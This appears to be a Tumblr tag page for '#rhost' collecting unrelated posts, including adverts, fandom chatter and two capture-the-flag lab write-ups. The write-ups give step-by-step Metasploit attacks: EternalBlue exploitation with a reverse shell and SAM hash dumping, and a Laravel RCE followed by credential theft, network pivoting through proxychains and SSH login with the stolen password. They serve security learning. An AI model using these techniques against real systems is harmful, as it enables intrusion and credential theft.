#rhost
Explore tagged Tumblr posts
Text
do people ship roach and ghost and if so may i propose the ship name rhost (like pronounced like roast) (get it?) (i'm hilarious) (i don't ship them but i think i'm funny okay)
#call of duty#cod#ghost#ghost cod#simon ghost riley#roach#roach cod#gary roach sanderson#rhost#i'm hilarious#aj thinkenings
36 notes
Text
remember that ghost, after watching reaper get beaten and waterboarded and nearly killed, he wanted to hold her. she'd just decimated CD's head, effectively making it 2D, covered in blood and sweat, and all he wanted to do was to kiss her, care for her, and protect her.
get you a man that sees you drenched in blood and loves you even more
30 notes
Text
Funny sketch I made at work, I love how dead Shaggy looks on the top.
5 notes
Text
EX210: Red Hat OpenStack Training (CL110 & CL210)
CL110 equips you to operate a secure, scalable RHOSP overcloud with OpenStack integration, enhancing troubleshooting skills. In CL210, you gain expertise in scaling and managing Red Hat OpenStack environments, using the OpenStack Client for seamless day-to-day operations of enterprise cloud applications.
Overview of this Training | CL110 & CL210 Red Hat OpenStack Administration I | CL110 Training | KR Network Cloud
The course CL110, Red Hat OpenStack Administration I: Core Operations for Domain Operators, educates you on how to run and maintain a production-ready Red Hat OpenStack Platform (RHOSP) single-site overcloud. The skills that participants will gain include managing security privileges for the deployment of scalable cloud applications and building secure project environments for resource provisioning. Integration of OpenShift with load balancers, identity management, monitoring, proxies, and storage are all covered in the course. Participants will also improve their Day 2 operations and troubleshooting skills. Red Hat OpenStack Platform 16.1 is in keeping with this course.
Red Hat OpenStack Administration II | CL210 Training | KR Network Cloud
The course CL210, Red Hat OpenStack Administration II: Day 2 Operations for Cloud Operators, is designed for service administrators, automation engineers, and cloud operators who manage Red Hat OpenStack Platform hybrid and private cloud environments. Participants in the course will learn how to scale, manage, monitor, and troubleshoot an infrastructure built on the Red Hat OpenStack Platform. The main goal is to set up metrics, policies, and architecture using the OpenStack Client command-line interface so that enterprise cloud applications can be supported and day-to-day operations run smoothly. For further information visit our Website: krnetworkcloud.org
0 notes
Text
Elevating Remote Desktop Experience with Application-Level Access: The RHosting Advantage
In the realm of remote desktop connections, where security and control are paramount, RHosting stands out by offering a distinctive advantage: the ability to grant users direct access to specific applications. This exclusive feature not only enhances security but also empowers administrators to tailor user experiences with unprecedented granularity.
Unveiling Application-Level Access
RHosting's prowess lies in its sophisticated configuration options, facilitated through its intuitive control panel. This unique feature enables administrators to align specific applications with individual users, granting them access only to designated applications on the server. But RHosting goes beyond mere application-level access; it extends granular control to folder-level restrictions as well, or even a combination of both. This level of detail ensures that users interact only with authorized applications or folders, in alignment with predetermined restrictions.
A Real-World Scenario
Consider a server with three distinct applications: a Billing Software, a Design Software, and a File Management Software. Now imagine five individuals with varying access requirements:
User 'A' needs access to the Billing Software only.
Users 'B' and 'C' require access to both the Billing and Design Software.
Users 'D' and 'E' need access only to the File Management Software.
In this scenario, the RHosting configuration panel empowers the administrator to assign each user their respective accesses, including specific folder accesses if necessary. This level of flexibility ensures that access privileges are customized according to precise organizational needs.
Enhancing Security and Control
By providing potent access management features, RHosting not only enhances security but also allows for a significant degree of control over the user experience. Administrators can enforce strict access controls, mitigating the risk of unauthorized access to sensitive data or applications. Moreover, this tailored approach promotes efficiency and effectiveness in organizational operations by ensuring that users have access only to the tools they need to perform their roles effectively.
Conclusion: A Tailored Approach to Remote Desktop Management
In a landscape where security and control are paramount, RHosting stands as a beacon of innovation with its application-level access capabilities. By offering granular control over user access, RHosting empowers organizations to customize access privileges according to their precise needs, thereby promoting efficiency, security, and peace of mind. With RHosting, organizations can elevate their remote desktop experience, knowing that their data and applications are secure and accessible only to those who need them.
0 notes
Note
answer for whomever you please: lightning, poison, parachute, and hobby
as always thank u for the ask char<3 going to do Several ocs bc haunted house so i have time to kill LMAO
oc ask meme!
lightning: who's the most impulsive character? and who is their impulse control?
oh man. probably thor or vugel? thor has No impulse control (very bad for everyone around him), vugel's impulse control is his mate, my friend ( @wolfoflyngvi )'s teostra oc, asmodeus.... though that's only Sometimes because vugel do as vugel please (unless asmo disapproves because vugel is the definition of a simp (would get very offended and launch into immediate Denial if you called him that) LMAO)
poison: vices/bad habits? what are they? how do they affect your OC?
for uriel: pretty soon after he came to stillwater, uriel took up the habit of smoking; being an angel, it doesn't TECHNICALLY affect him? but it does still make him more prone to agitation when he goes without smoking, even if it doesn't technically have any ill effect on his overall health
vul: stress-eating; due to her food anxiety, she has a tendency to eat when stressed, occasionally over-eating and making herself sick, and often indulging in mortal foods that don't actually have much (if any) nutritional value to her.
parachute: who does your OC(s) trust the most? who makes them feel safe? who would they do absolutely anything for?
uriel again bc brainrot lmao: with absolutely no contest, johnny gat; he would literally subject himself to the depths of hell (ironic innit?) for gat. johnny was the first mortal that uriel ever became close to and genuinely fond of, and through him he slowly learned to value SOME mortal life, and grew closer to other members of the saints as well---though johnny remains the one he's by far the closest to.
shang: oh man here's an oc i NEVER talk about LMFAO, my very first mh oc<3 shang is a surly, ill-tempered man who seldom trusts people, vastly preferring the company of monsters thanks to having been raised by one; the ONE person who makes him feel the most safe, that he trusts in absolute and would do anything for, is his fiancé, rhost, the admiral. despite his natural mistrust towards and aversion of hunters, he and rhost operate on nearly the same (extremely poor decision making) wavelength, with a fierce loyalty to and understanding of each other that few other people (monster or otherwise) could ever hope to have for either of them.
hobby: what do they love? what captivates them? what are their passions?
lokzii: lokzii adores gardening, cooking and making tea; though he typically assumes his mortal guise to purchase food ingredients from markets, he grows almost all of the herbal ingredients for his tea himself in a quaint, peaceful garden, nestled in a ruined courtyard that is bathed in the sapphire star's light every night. he also tends to various flowers and a few fruit-bearing plants as well.
the alatreon: here's an oc i haven't talked about here before! the alatreon's favourite hobby is... experimentation. given how it views most other beings as inferior to itself, it finds enjoyment in "experimenting" on them; this can range from simply intentionally setting up some sort of situation for one to fall into so to observe how it plays out, to testing what would happen if it injected raw dragon element directly into another being's bloodstream.
#mar.txt#answered#wing-dingy#oc tag: thor#oc tag: vugel#oc tag: uriel#oc tag: vuljud#oc tag: shang#oc tag: lokzii#oc tag: the alatreon#monster hunter#saints row
2 notes
Text
1* 2.6.2. 3 3B2 5.0i 5.1 5.53 7 15kg 17 20 22nd 26 50BMG 51 69 97 312 411 414 707 737 747 757 767 777 868 888 1071 1080H 1911 1984 1997 2600 3848 8182 $ & ^ ^? a ABC ACC Active ADIU advise advisors afsatcom AFSPC AHPCRC AIEWS AIMSX Aladdin Alica Alouette AMEMB Amherst AMW anarchy ANC Anonymous AOL ARC Archives Area51 argus Armani ARPA Artichoke ASIO ASIS ASLET assasinate Asset AT AT&T Atlas Audiotel Austin AVN b b9 B.D.M. Badger bank basement BATF BBE BECCA Becker beef Bess bet Beyond BfV BITNET black-bag Black-Ops Blackbird Blacklisted Blackmednet Blacknet Bletchley Blowfish Blowpipe BMDO BND Bob BOP BOSS botux BRLO Broadside Bubba bullion BVD BZ c Cable CANSLO Cap-Stun Capricorn card Case CATO CBM CBNRC CBOT CCC CCS CDA CDC CdC cdi Cell CESID CFC chaining chameleon Chan Chelsea Chicago Chobetsu chosen CIA CID CIDA CIM CIO CIS CISE Clandestine Class clone cocaine COCOT Coderpunks codes Cohiba Colonel Comirex Competitor Compsec Computer Connections Consul Consulting CONUS Cornflower Corporate Corporation COS COSMOS Counter counterintelligence Counterterrorism Covert Cowboy CQB CRA credit cryptanalysis crypto-anarchy CSE csystems CTP CTU CUD cybercash Cypherpunks d D-11 Daisy Data data data-haven DATTA DCJFTF Dead DEADBEEF debugging DefCon Defcon Defense Defensive Delta DERA DES DEVGRP DF DIA Dictionary Digicash disruption
DITSA DJC DOE Dolch domestic Domination DRA DREC DREO DSD DSS Duress DynCorp E911 e-cash E.O.D. E.T. EADA eavesdropping Echelon EDI EG&G Egret Electronic ELF Elvis Embassy Encryption encryption enigma EO EOD ESN Espionage espionage ETA eternity EUB Evaluation Event executive Exon explicit Face fangs Fax FBI FBIS FCIC FDM Fetish FINCEN finks Firewalls FIS fish fissionable FKS FLAME Flame Flashbangs FLETC Flintlock FLiR Flu FMS Force force Fort Forte fraud freedom Freeh froglegs FSB Ft. FX FXR Gamma Gap garbage Gates Gatt GCHQ GEO GEODSS GEOS Geraldton GGL GIGN Gist Global Glock GOE Goodwin Gorelick gorilla Gorizont government GPMG Gray grom Grove GRU GSA GSG-9 GSS gun Guppy H&K H.N.P. Hackers HAHO Halcon Halibut HALO Harvard hate havens HIC High Hillal HoHoCon Hollyhock Hope House HPCC HRT HTCIA humint Hutsul IACIS IB ICE ID IDEA IDF IDP illuminati imagery IMF Indigo industrial Information INFOSEC InfoSec Infowar Infrastructure Ingram INR INS Intelligence intelligence interception Internet Intiso Investigation Ionosphere IRIDF Iris IRS IS ISA ISACA ISI ISN ISS IW jack JANET Jasmine JAVA JICC jihad JITEM Juile Juiliett Keyhole keywords Kh-11 Kilderkin Kilo Kiwi KLM l0ck LABLINK Lacrosse Lebed LEETAC Leitrim Lexis-Nexis LF LLC loch lock Locks Loin Love LRTS LUK Lynch M5 M72750 M-14 M.P.R.I. Mac-10 Mace Macintosh Magazine mailbomb man Mantis market Masuda Mavricks Mayfly MCI MD2 MD4 MD5 MDA Meade Medco mega Menwith Merlin Meta-hackers MF MI5 MI6 MI-17 Middleman Military Minox MIT MITM MOD MOIS mol Mole Morwenstow Mossberg MP5k MP5K-SD MSCJ MSEE MSNBC MSW MYK NACSI NATIA National NATOA NAVWAN NAVWCWPNS NB NCCS NCSA Nerd News niche NIJ Nike NIMA ninja nitrate nkvd NOCS noise NORAD NRC NRL NRO NSA NSCT NSG NSP NSWC NTIS NTT Nuclear nuclear NVD OAU Offensive Oratory Ortega orthodox Oscor OSS OTP package Panama Park passwd Passwords Patel PBX PCS Peering PEM penrep Perl-RSA PFS PGP Phon-e phones PI picking
Pine pink Pixar PLA Planet-1 Platform Playboy plutonium POCSAG Police Porno Pornstars Posse PPP PPS president press-release Pretoria Priavacy primacord PRIME Propaganda Protection PSAC Pseudonyms Psyops PTT quiche r00t racal RAID rail Rand Rapid RCMP Reaction rebels Recce Red redheads Reflection remailers ReMOB Reno replay Retinal RFI rhost rhosts RIT RL rogue Rolm Ronco Roswell RSA RSP RUOP RX-7 S.A.I.C. S.E.T. S/Key SABC SACLANT SADF SADMS Salsa SAP SAR Sardine sardine SAS SASP SASR Satellite SBI SBIRS SBS SCIF screws Scully SDI SEAL Sears Secert secret Secure secure Security SEL SEMTEX SERT server Service SETA Sex SGC SGDN SGI SHA SHAPE Shayet-13 Shell shell SHF SIG SIGDASYS SIGDEV sigvoice siliconpimp SIN SIRC SISDE SISMI Skytel SL-1 SLI SLIP smuggle sneakers sniper snuffle SONANGOL SORO Soros SORT Speakeasy speedbump Spetznaz Sphinx spies Spoke Sponge spook Spyderco squib SRI ssa SSCI SSL stakeout Standford STARLAN Stego STEP Stephanie Steve Submarine subversives Sugar SUKLO SUN Sundevil supercomputer Surveillance SURVIAC SUSLO SVR SWAT sweep sweeping SWS Talent TDM. TDR TDYC Team Telex TELINT Templeton TEMPSET Terrorism Texas TEXTA. THAAD the Ti TIE Tie-fighter Time toad Tools top TOS Tower transfer TRD Trump TRW TSCI TSCM TUSA TWA UDT UHF UKUSA unclassified UNCPCJ Undercover Underground Unix unix UOP USACIL USAFA USCG USCODE USCOI USDOJ USP USSS UT/RUS utopia UTU UXO Uzi V veggie Verisign VHF Video Vinnell VIP Virii virtual virus VLSI VNET W3 Wackendude Wackenhutt Waihopai WANK Warfare Weekly White white Whitewater William WINGS wire Wireless words World WORM X XS4ALL Yakima Yobie York Yukon Zen zip zone ~
2 notes
Text
Once LMHOST is set and RHOST is set then execute the exploit command to deliver the payload.
0 notes
Text
First post! | Tryhackme #1 "Blue". | EternalBlue
Hello friends, for my first writeup I have decided to complete the "Blue" room from Tryhackme.
This room covers basic reconnaissance and compromising a Windows 7 machine that is vulnerable to Eternalblue (MS17-010 / CVE-2017-0144). Eternalblue is a vulnerability in Microsoft's implementation of Server Message Block (SMB) version 1; the exploit utilises a buffer overflow to allow the execution of remote code.
To begin with we will perform a scan of the machine to get an idea of what ports are open and also the target OS.
We know the machine's IP is 10.10.7.17 which is all the information we have to work off, with the exception of information provided by the lab.
We will start with a Nmap scan using the following command "sudo nmap 10.10.7.17 -A -sC -sV". The breakdown of this command is as follows: -A specifies OS detection, version detection, script scanning, and traceroute which provides us more information from the scan. -sC runs default scripts from nmap which can give us more insight depending on the scripts that run. -sV will provide us the version numbers of any software running on the port which is important for us, as we may be able to identify vulnerable versions of software and get an idea of how frequently the device is updated and maintained.
Our scan has come back and we can see the target device is running Windows 7 Professional service pack 1 (which means it should be vulnerable to Eternalblue which we will confirm shortly) we also get a lot more information about the target.
From our initial scan we now have the following information;
Operating system and version (Win 7 Pro SP1)
Hostname is Jon-PC
Device is in a workgroup and not a domain
Ports 135,139,445,3389 are open.
Of interest to us currently are ports 445 and 3389. 445 is SMB, which is what Eternalblue targets, and 3389 is Remote Desktop Protocol, which allows remote connection and control on a Windows device.
With this being an easy room with a known exploit let's move on to gaining access to the machine. First we will start up Metasploit, which is a framework that contains modules which we can use to interact with and eventually gain control of our target device.
Metasploit has a built in search function, using this I have searched for Eternalblue and loaded the first result (exploit/windows/smb/ms17_010_eternalblue).
With the exploit selected I now open up the options for the payload and module and configure the following;
RHOSTS (remote host / target)
RPORT (remote port, automatically filled with 445 as this is an SMB exploit)
VERIFY_TARGET (doesn't need to be configured but by default it is enabled, this will check if the target is vulnerable before committing the exploit)
LPORT (local port to use on my machine)
LHOST (local address or interface) in my case I will set this to the tun0 interface on my machine as I am connected over a VPN, as identified by running "ifconfig".
The only change I make is to set the payload to payload/windows/shell_reverse_tcp to provide a non-meterpreter reverse shell as I find this gives me better results.
With these set we run the exploit and after less than a minute I get a success message and a reverse shell, as we can see our terminal is now displaying "C:\Windows\system32" and running a "whoami" command it returns "nt authority\system".
We now have a reverse shell on the target with the highest permissions possible as we are running as the system. From here we can move around the system and gather the "flags" for the lab and complete the rest of the questions, so let's do that!
First off we need to upgrade our shell to a meterpreter shell. We will background our current shell with ctrl+z and make a note of the session number which is 6 (we'll need this later).
To upgrade our shell we will need another module from metasploit, in this case a "post" module. These are post exploitation modules to help with various tasks, in our case we want to upgrade our regular reverse shell to a meterpreter shell which will provide us more options, some are shown below to give you an idea!
The module for this is post/multi/manage/shell_to_meterpreter
The only option we need to set is the session number of our existing shell, which was 6, once we run this we can confirm that our meterpreter shell is now created by running "sessions" which will list our current sessions.
From here we can run "sessions -i 7" to swap to session 7 in our terminal. Now we are in our meterpreter shell, we can use "help" to list what extra commands we have, but more importantly we need to migrate our shell to a stable process with system privileges still. We will list all running processes using the "ps" command, identify a process such as "spoolsv.exe". We will migrate to this using its Process ID, so we will enter "migrate 1224" to migrate to this process.
Next we need to dump the SAM database which will provide us all the hashed passwords on the computer so we can crack them.
We will use the convenient command "hashdump" from our meterpreter shell to achieve this for us, this provides us the following password hashes;
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
The question wants us to crack the password for Jon, for ease of use and to keep this writeup on the short side we will use crackstation.net, we take the last part of the Jon hash "ffb43f0de35be4d9917ac0cc8ad57f8d" and enter it into the website, this will match the hash against a database as this is a weak password.
We could have used Hashcat or John the Ripper to crack the password, which we will do in the future as this website can only manage a few hash types.
The final step is finding the flags to complete the lab so we will hunt these down, however with this being a writeup I will obfuscate the flags.
The first is at C:\ and is "flag{********_the_machine}".
The second is where the SAM database resides C:\Windows\system32\config and is "flag{*******_database_elevated_access}".
The third is a good place to check for valuable information, which is user directories, especially if they hold a technical position or an elevated position at the target site. The flag is located in C:\Users\Jon\Documents and is "flag{admin_****_can_be_valuable}".
I hope you found this helpful or interesting at least! I aim to upload writeups slowly as I get myself back into the swing of things again!
Until next time
Lilith
1 note
Text
On the sidelines of a Character Convocation some months back
[Wherein we find Gilly from Goober and the Ghost Chasers and Norville "Shaggy" Rogers from the Scooby-Doo franchise in conversation over sandwiches and iced tea by and large. Let's listen in--]
NORVILLE "SHAGGY" ROGERS, with his usual hippie exuberance: Like, Gilly, I assume you know just how much Scoob and I can manage to go through whole meals, and then some--and man, can we get STUFFED rather quickly!
GILLY: Meanwhile, Shag ... I assume you know that our dog Goober has this habit of disappearing whenever he suspects the appearance of ghosts or other spectral objects ... and I mean DISAPPEARING outright! But still, he manages to come back when the ghost passes some distance away!
NORVILLE "SHAGGY" ROGERS: Yet even then, Scoob can go off in the distance when something suspicious is detected ... and boy, can he manage to turn up evidence as unmasks many a "ghost"!
GILLY: On the other hand, I assume you've heard of some ghost photography such as I've been known to do with cheap infrared film, capturing actual ghosts in the bargain!
SCOOBY-DOO, somewhat taken in by this: Reah! Rhosts!
#hanna barbera#vignette#unlikely conversation#character convocation#on the sidelines#shaggy and scooby#gilly (goober and the ghost chasers)#large appetites#ghost photography#hannabarberaforever
0 notes
Text
RHosting distinguishes itself from the competition with one of its most prominent features - the ability to manage concurrent printing commands. While other products are tethered to a singular print spooler operation, RHosting creates a direct conduit to local printers and proficiently coordinates print commands across multiple spoolers. This avant-garde approach eradicates the need for complex internal print queuing systems, fostering improved speed and operational efficiency.
#advancedprinting #access
0 notes
Text
Advent of cyber day 9 pivoting
Advent of cyber 2022
Day 9 pivoting
Deploy the attached VM, and wait a few minutes. What ports are open?
Run a quick nmap scan
nmap -sV -sC -F 10.10.98.22
-sV: Probe open ports to determine service/version info
-sC: A simple script scan using the default set of scripts
-F fast scan
80
What framework is the web application developed with?
This info is at the bottom of the webpage
laravel
What CVE is the application vulnerable to?
in metasploit it's in the info section for the exploit
CVE-2021-3129
What command can be used to upgrade the last opened session to a Meterpreter session?
sessions -u -1
What file indicates a session has been opened within a Docker container?
/.dockerenv
What file often contains useful credentials for web applications?
.env
What database table contains useful credentials?
users
What is Santa's password?
p4$$w0rd
What ports are open on the host machine?
What is the root flag?
Pivot! steps
Launch Metasploit
msfconsole
search laravel
Matching Modules
#  Name                                              Disclosure Date  Rank       Check  Description
-  ----                                              ---------------  ----       -----  -----------
0  exploit/unix/http/laravel_token_unserialize_exec  2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution
1  exploit/multi/php/ignition_laravel_debug_rce      2021-01-13       excellent  Yes    Unauthenticated remote code execution in Ignition
info 1
Description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
use 1
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set RHOSTS 10.10.98.22
RHOSTS => 10.10.98.22
Check
[] Checking component version to 10.10.98.22:80
[] 10.10.98.22:80 - The target appears to be vulnerable.
To summarise, all that's happened so far is after a little enumeration with nmap and looking at the website, we know port 80 is open and the website is made using laravel.
Next we launch Metasploit, look for any laravel exploits, check they are suitable then launch them.
show targets
This shows what targets are suitable for this exploit.
Set LHOST 10.10.94.167
ip a will tell you your ip address
run
Command shell session 1 opened (10.10.94.167:4444 -> 10.10.98.22:50682) at 2022-12-14 11:22:47 +0000
whoami
www-data
We have a shell! What we need now is to upgrade it to Meterpreter, so
background
sessions
Active sessions
Id  Name  Type            Information  Connection
--  ----  ----            -----------  ----------
1         shell cmd/unix               10.10.94.167:4444 -> 10.10.98.22:50682 (10.10.98.22)
sessions -u -1
this upgrades the shell to a Meterpreter shell
then to use it:
sessions -i 2
-i means interact
we now have our Meterpreter shell, time to make a native shell
shell
env
Show the environment
USER=www-data
HOME=/var/www
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
LANG=C
PWD=/var/www/html
cd /var/www
ls -la
ls -la: Long format list (permissions, ownership, size, and modification date) of all files:
total 324
drwxr-xr-x 1 www-data www-data   4096 Sep 13 19:39 .
drwxr-xr-x 1 root     root       4096 Sep 13 09:45 ..
-rw-r--r-- 1 503      staff       868 Sep 12 17:08 .env
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:55 app
-rwxr-xr-x 1 www-data www-data   1686 Sep 11 00:44 artisan
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:59 bootstrap
-rw-r--r-- 1 www-data www-data   1613 Sep 11 00:44 composer.json
-rw-r--r-- 1 www-data www-data 247888 Sep 11 01:01 composer.lock
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:55 config
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:55 database
drwxr-xr-x 2 www-data www-data   4096 Sep 13 16:55 html
-rw-r--r-- 1 www-data www-data    944 Sep 11 00:44 package.json
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:55 resources
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:55 routes
-rw-r--r-- 1 www-data www-data    563 Sep 11 00:44 server.php
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:59 storage
drwxr-xr-x 1 www-data www-data   4096 Sep 13 17:04 vendor
-rw-r--r-- 1 www-data www-data    559 Sep 11 01:14 webpack.mix.js
we've been told the .env file in docker containers have all the good stuff so
cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:NEMESCXelEv2iYzbgq3N30b9IAnXzQmR7LnSzt70rso=
APP_DEBUG=true
APP_URL=http://localhost
LOG_CHANNEL=stack
LOG_LEVEL=debug
this is what we want
DB_CONNECTION=pgsql
DB_HOST=webservice_database
DB_PORT=5432
DB_DATABASE=postgres
DB_USERNAME=postgres
DB_PASSWORD=postgres
BROADCAST_DRIVER=log
CACHE_DRIVER=file
QUEUE_CONNECTION=sync
SESSION_DRIVER=file
SESSION_LIFETIME=120
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379
MAIL_MAILER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null
MAIL_FROM_ADDRESS=null
MAIL_FROM_NAME="${APP_NAME}"
AWS_ACCESS_KEY_ID=
AWS_SECRET_ACCESS_KEY=
AWS_DEFAULT_REGION=us-east-1
AWS_BUCKET=
PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
useful info: location of the database - webservice_database password:postgres username:postgres
we need to find out where webservice_database is. To do this
exit to get back to Meterpreter
resolve webservice_database
Host resolutions
Hostname             IP Address
--------             ----------
webservice_database  172.28.101.51
create a shell
shell
This shell doesn't have much usability, however we are given the info that 172.17.0.1 is a very likely address for the machine controlling the docker containers. Now the two ip addresses that we have can only be accessed from within the docker container
at this point it's worth noting that you can upload tools, such as nmap, onto this container to then use, but this is inefficient and prone to failure.
This is where we PIVOT, as in route the traffic from our machine through RHOST
Exit back to meterpreter then background it
Now we need to set up our port forwarding or pivoting in metasploit using the route command
route -h shows all the options
route add 172.28.101.51/32 2
/32 is the subnet for a single ip address - i need to look into subnets. The 2 on the end is for session 2, which is our meterpreter shell (which is the initial session), and
route add 172.17.0.1/32 2
so both of these connections will be routed through our original host
route print lets us check all is well
time to access the database
search postgres
we will use schemadump
use 16
msf6 auxiliary(scanner/postgres/postgres_schemadump) > set RHOSTS 172.28.101.51
run
DBName: postgres Tables:
TableName: users_id_seq Columns:
ColumnName: last_value ColumnType: int8 ColumnLength: '8'
ColumnName: log_cnt ColumnType: int8 ColumnLength: '8'
ColumnName: is_called ColumnType: bool ColumnLength: '1'
TableName: users Columns:
ColumnName: id ColumnType: int4 ColumnLength: '4'
ColumnName: username ColumnType: varchar ColumnLength: "-1"
ColumnName: password ColumnType: varchar ColumnLength: "-1"
ColumnName: created_at ColumnType: timestamp ColumnLength: '8'
ColumnName: deleted_at ColumnType: timestamp ColumnLength: '8'
TableName: users_pkey Columns:
ColumnName: id ColumnType: int4 ColumnLength: '4'
now we need to look at the table and pull info off it.
search postgres
the server generic query exploits look promising.
use 11
info
set RHOSTS
set DATABASE postgres this is from the info we've enumerated so far
set SQL "select * from users"
this asks to retrieve all information from the users table
run
id  username  password  created_at                  deleted_at
--  --------  --------  ----------                  ----------
1   santa     p4$$w0rd  2022-09-13 19:39:51.669279  NIL
We have some credentials, time to get to the host. We need to set up a socks proxy to route all traffic through our 'johnny', so
search socks
use 0
msf6 auxiliary(server/socks_proxy) >
make a note of the port being used (1080)
msf6 auxiliary(server/socks_proxy) > run
jobs - checks it's running
new tab, metasploit should now be running traffic from kali through the proxy we set up,
curl --proxy socks5://127.0.0.1:1080 http://172.17.0.1
curl: Transfers data from or to a server. Supports most protocols, including HTTP, FTP, and POP3.
this works
now to use proxychains
(vim wasn't working so i used nano)
nano /etc/proxychains4.conf
scroll to the bottom, like when using this previously, set it to socks5 and set port to 1080, now all traffic should route through what we set up in meterpreter.
we can now use proxychains, but when using nmap we have to turn off ping to get it to work.
proxychains nmap -F -sV -sT -Pn 172.17.0.1
this went down and i lost my shell, as this is my third attempt, i’m adding what the video shows from now as i gotta go.
nmap shows ports 22 and 80 open
I’ve redone this and got it working without crashing
port 22 is an ssh port so using metasploit
search ssh_login
use 0
set RHOST 172.17.0.1 PASSWORD p4$$w0rd USER santa
run
then when this completes,
sessions
we can see there is a new session 3
sessions -i 3
ls
this shows us flag.txt
cat flag.txt
we have our flag
0 notes
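Added example, not part of the original post or the room's material: the weak settings the walkthrough above depended on inside the container (APP_DEBUG=true, which the quoted Ignition description names as the precondition; DB_PASSWORD identical to DB_USERNAME; a .env listed as -rw-r--r--) can all be checked before deployment. The rule names, the default-password list and both sample files are constructed for illustration.

```python
"""Audit a Laravel-style .env for debug mode, default credentials and loose file mode."""
import os
import re
import stat

# Constructed sample modelled on the settings quoted in the post (APP_KEY left out).
SAMPLE_ENV = """\
APP_NAME=Laravel
APP_ENV=local
APP_DEBUG=true
APP_URL=http://localhost
LOG_LEVEL=debug
DB_CONNECTION=pgsql
DB_HOST=webservice_database
DB_PORT=5432
DB_DATABASE=postgres
DB_USERNAME=postgres
DB_PASSWORD=postgres
REDIS_PASSWORD=null
MAIL_FROM_NAME="${APP_NAME}"
"""

# Constructed hardened counterpart; the password is a placeholder, not a real secret.
HARDENED_ENV = """\
APP_ENV=production
APP_DEBUG=false
LOG_LEVEL=warning
DB_USERNAME=webapp
DB_PASSWORD=Xq7-constructed-long-random-value
"""

# Assumption: a small illustrative list of passwords treated as vendor defaults.
DEFAULT_PASSWORDS = {"postgres", "password", "admin", "root", "secret", "changeme"}
UNSET = {"", "null"}  # values that mean "not configured" and are skipped
_LINE = re.compile(r"^(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$")


def parse_env(text):
    """Return {KEY: value}; skips blanks and # comments, strips matching quotes."""
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = _LINE.match(line)
        if not match:
            continue
        key, value = match.group(1), match.group(2).strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        values[key] = value
    return values


def audit_env(text):
    """Return a list of (severity, key, rule) findings for the given .env text."""
    env = parse_env(text)
    findings = []
    # Debug mode is what exposes the Ignition error handler on a live site.
    if env.get("APP_DEBUG", "").lower() in ("true", "1"):
        findings.append(("HIGH", "APP_DEBUG", "debug-enabled"))
    if env.get("APP_ENV", "production").lower() in ("local", "dev", "development", "testing"):
        findings.append(("MEDIUM", "APP_ENV", "non-production-env"))
    for key, value in env.items():
        if not key.endswith("_PASSWORD") or value.lower() in UNSET:
            continue
        if value.lower() in DEFAULT_PASSWORDS:
            findings.append(("HIGH", key, "default-password"))
        # Compare with the sibling *_USERNAME key (DB_PASSWORD -> DB_USERNAME).
        user = env.get(key[: -len("_PASSWORD")] + "_USERNAME", "")
        if user and user == value:
            findings.append(("HIGH", key, "password-equals-username"))
    return findings


def audit_file(path):
    """Audit a .env on disk and also flag it when any local user can read it."""
    with open(path, encoding="utf-8") as handle:
        findings = audit_env(handle.read())
    if os.stat(path).st_mode & stat.S_IROTH:
        findings.append(("MEDIUM", path, "world-readable"))
    return findings


if __name__ == "__main__":
    for severity, key, rule in audit_env(SAMPLE_ENV):
        print(f"{severity:6} {key:12} {rule}")
```

Run in CI or as a container build step, a non-empty result from `audit_file` is a reason to fail the build rather than ship the image.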
Note
Wat reality TV show would you like the avengers to take part in? I think they wud be amazing in I'm a celebrity get me out of HERE, but I also think a baking/Cooking competition show wud be quite funny. Tony-"baking is just science!! WHY IS IT NOT WORKING!!?! Boil damn you!" whil Steve is in the corner using chocolate and cream to sketch tonys face into the side of his burnt soufflé,
OOO I love this….
I forever want them in the most domestic situations so PLEASE give me 2000s era Real World: Avengers Tower.
Or Big Brother: Avengers, and make them form alliances slowly but surely, and Steve and Tony would start out not getting along, but would slowly but surely realize they work super well together, form an alliance, and then panic when they realize they have ~*developed feelings*~ and therefore never want the other to get voted out?
BUT you are also right, and any kind of baking/cooking show would be amazing, but it would have to be like Nailed It, on Netflix, and Tony thinking Steve is too good to be on a disaster show, and why are his cookies FLAT, why is his cake LEAKING, why does everything Steve make look like a work of art?? He wants to throw flour at him but also kiss his face!!!
#Real Housewives: AVENGERS#RHOST#don't even get me started on a Bachelor AU where tony is the bachelor and decides he loves steve on week one and the rest is alllll pretend#or well#more pretend than usual ykwim#anonymous#this question has so many possibilities.....
22 notes
Text
Revolutionizing Printing Solutions with RHosting: Efficiency Meets Convenience
